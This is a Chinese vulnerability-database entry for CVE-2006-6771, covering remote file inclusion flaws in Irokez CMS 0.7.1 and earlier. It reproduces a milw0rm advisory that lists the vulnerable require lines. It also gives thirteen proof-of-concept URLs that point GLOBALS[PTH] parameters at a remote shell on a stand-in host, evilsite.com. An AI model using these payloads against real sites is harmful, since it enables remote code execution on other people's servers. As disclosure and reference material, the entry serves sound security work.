Irokez CMS多个远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111862 漏洞类型 输入验证
发布时间 2006-12-25 更新时间 2007-01-02
CVE编号 CVE-2006-6771 CNNVD-ID CNNVD-200612-574
漏洞平台 PHP CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/3007
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-574
|漏洞详情
IrokezCMS存在多个PHP远程文件包含漏洞,在启用register_globals的情况下,远程攻击者可以通过(a)scripts/gallery.scr.php中(1)GLOBALS[PTH][func]参数;(b)scripts/xtextarea.scr.php中(2)GLOBALS[PTH][spaw]参数;和scripts/中的(c)sitemap.scr.php,(d)news.scr.php,(e)polls.scr.php,(f)rss.scr.php,(g)search.scr.php,以及在functions/的(h)form.fun.php,(i)general.func.php,(j)groups.func.php,(k)js.func.php,(l)sections.func.php和(m)users.func.php中的(3)GLOBALS[PTH][classes]参数中的URL执行任意PHP代码。
|漏洞EXP
+-------------------------------------------------------------------------------------------
+ Irokez CMS <= 0.7.1 Multiple Remote File Include Vulnerabilities
+-------------------------------------------------------------------------------------------
+ Vendor ............: http://www.irokez.org/
+ Affected Software .: Irokez CMS <= 0.7.1
+ Download ..........: http://www.irokez.org/releases/irokez-0.7.1.zip
+ Description .......: "Irokez is a blogging based CMS"
+ Class .............: Remote File Inclusion
+ Risk ..............: High (Remote File Execution)
+ Found By ..........: nuffsaid <nuffsaid[at]newbslove.us>
+-------------------------------------------------------------------------------------------
+ Details:
+ Irokez CMS has several scripts which do not initialize variables before using them to include
+ files, assuming register_globals = on, we can initialize any one of the variables in a query
+ string and include a remote file of our choice.
+
+ Vulnerable Code:
+ scripts/gallery.scr.php, line(s) 11-12:
+ -> 11: require_once "{$GLOBALS['PTH']['func']}gallery.func.php";
+ -> 12: require_once "{$GLOBALS['PTH']['classes']}gallery.class.php";
+ scripts/sitemap.scr.php, line(s) 13:
+ -> 13: include_once $GLOBALS['PTH']['classes'] . 'menu.class.php';
+ scripts/news.scr.php, line(s) 11:
+ -> 11: require_once $GLOBALS['PTH']['classes'] . 'news.class.php';
+ scripts/polls.scr.php, line(s) 03:
+ -> 03: require_once $GLOBALS['PTH']['classes'] . 'poll.class.php';
+ scripts/rss.scr.php, line(s) 04:
+ -> 04: require_once "{$GLOBALS['PTH']['classes']}news.class.php";
+ scripts/search.scr.php, line(s) 04:
+ -> 04: require_once "{$GLOBALS['PTH']['classes']}content.class.php";
+ scripts/xtextarea.scr.php, line(s) 03-04:
+ -> 03: $GLOBALS['spaw_root'] = $spaw_root = $GLOBALS['PTH']['spaw'];
+ -> 04: require_once $GLOBALS['PTH']['spaw'] . 'spaw_control.class.php';
+ functions/form.func.php, line(s) 03:
+ -> 03: require_once "{$GLOBALS['PTH']['classes']}lang.class.php";
+ functions/general.func.php, line(s) 06:
+ -> 06: require_once "{$GLOBALS['PTH']['classes']}lang.class.php";  //TBL_Lang description
+ functions/groups.func.php, line(s) 03:
+ -> 03: require_once "{$GLOBALS['PTH']['classes']}group.class.php";
+ functions/js.func.php, line(s) 04:
+ -> 04: require_once "{$GLOBALS['PTH']['classes']}lang.class.php";
+ functions/sections.func.php, line(s) 03:
+ -> 03: require_once "{$GLOBALS['PTH']['classes']}section.class.php";
+ functions/users.func.php, line(s) 03:
+ -> 03: require_once "{$GLOBALS['PTH']['classes']}user.class.php";
+
+ Proof Of Concept:
+ http://[target]/[path]/scripts/gallery.scr.php?GLOBALS[PTH][func]=http://evilsite.com/shell.php?
+ http://[target]/[path]/scripts/sitemap.scr.php?GLOBALS[PTH][classes]=http://evilsite.com/shell.php?
+ http://[target]/[path]/scripts/news.scr.php?GLOBALS[PTH][classes]=http://evilsite.com/shell.php?
+ http://[target]/[path]/scripts/polls.scr.php?GLOBALS[PTH][classes]=http://evilsite.com/shell.php?
+ http://[target]/[path]/scripts/rss.scr.php?GLOBALS[PTH][classes]=http://evilsite.com/shell.php?
+ http://[target]/[path]/scripts/search.scr.php?GLOBALS[PTH][classes]=http://evilsite.com/shell.php?
+ http://[target]/[path]/scripts/xtextarea.scr.php?GLOBALS[PTH][spaw]=http://evilsite.com/shell.php?
+ http://[target]/[path]/functions/form.func.php?GLOBALS[PTH][classes]=http://evilsite.com/shell.php?
+ http://[target]/[path]/functions/general.func.php?GLOBALS[PTH][classes]=http://evilsite.com/shell.php?
+ http://[target]/[path]/functions/groups.func.php?GLOBALS[PTH][classes]=http://evilsite.com/shell.php?
+ http://[target]/[path]/functions/js.func.php?GLOBALS[PTH][classes]=http://evilsite.com/shell.php?
+ http://[target]/[path]/functions/sections.func.php?GLOBALS[PTH][classes]=http://evilsite.com/shell.php?
+ http://[target]/[path]/functions/users.func.php?GLOBALS[PTH][classes]=http://evilsite.com/shell.php?
+-------------------------------------------------------------------------------------------

# milw0rm.com [2006-12-25]
|参考资料

来源:BID
名称:21769
链接:http://www.securityfocus.com/bid/21769
来源:VUPEN
名称:ADV-2006-5178
链接:http://www.frsirt.com/english/advisories/2006/5178
来源:SECUNIA
名称:23497
链接:http://secunia.com/advisories/23497
来源:MILW0RM
名称:3007
链接:http://milw0rm.com/exploits/3007